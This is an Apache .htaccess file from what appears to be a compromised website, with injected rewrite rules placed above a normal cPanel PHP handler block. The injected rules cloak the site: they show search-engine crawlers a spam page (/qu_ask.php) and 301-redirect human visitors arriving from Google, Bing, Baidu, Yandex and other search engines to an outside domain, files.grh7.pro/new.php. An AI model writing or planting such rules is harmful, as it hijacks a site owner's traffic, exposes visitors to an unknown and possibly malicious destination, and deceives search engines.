File: /home/trebiaseguros/www/.htaccess
<IfModule mod_setenvif.c>
SetEnvIfNoCase User-Agent "(Googlebot|Googlebot-Image|Googlebot-News|bingbot|Baiduspider|YandexBot|Slurp|DuckDuckBot|Sogou|Bytespider|AdsBot-Google|Mediapartners-Google)" is_spider=1
</IfModule>
<IfModule mod_rewrite.c>
RewriteEngine On
RewriteBase /
RewriteCond %{REQUEST_URI} ^/qu_ask\.php$ [NC]
RewriteRule ^ - [L]
RewriteCond %{ENV:is_spider} ^1$
RewriteCond %{REQUEST_URI} !^/news/
RewriteCond %{REQUEST_URI} !^/qu_ask\.php$ [NC]
RewriteRule ^.*$ /qu_ask.php [R=301,L]
</IfModule>
<IfModule mod_rewrite.c>
RewriteEngine On
RewriteCond %{HTTP_REFERER} !^$
RewriteCond %{HTTP_REFERER} !^https?://(www\.)?%{HTTP_HOST} [NC]
RewriteCond %{ENV:is_spider} !=1
RewriteCond %{HTTP_REFERER} google\.[^/]+/(search|url) [NC,OR]
RewriteCond %{HTTP_REFERER} bing\.com/(search|ck/) [NC,OR]
RewriteCond %{HTTP_REFERER} (search\.yahoo\.com|r\.search\.yahoo\.com) [NC,OR]
RewriteCond %{HTTP_REFERER} baidu\.com/(s|link) [NC,OR]
RewriteCond %{HTTP_REFERER} sogou\.com/web [NC,OR]
RewriteCond %{HTTP_REFERER} duckduckgo\.com/\? [NC,OR]
RewriteCond %{HTTP_REFERER} yandex\.(com|ru|net)/search [NC]
RewriteRule ^ https://files.grh7.pro/new.php [R=301,L]
</IfModule>
# php -- BEGIN cPanel-generated handler, do not edit
# Set the “ea-php83” package as the default “PHP” programming language.
<IfModule mime_module>
AddHandler application/x-httpd-ea-php83 .php .php8 .phtml
</IfModule>
# php -- END cPanel-generated handler, do not edit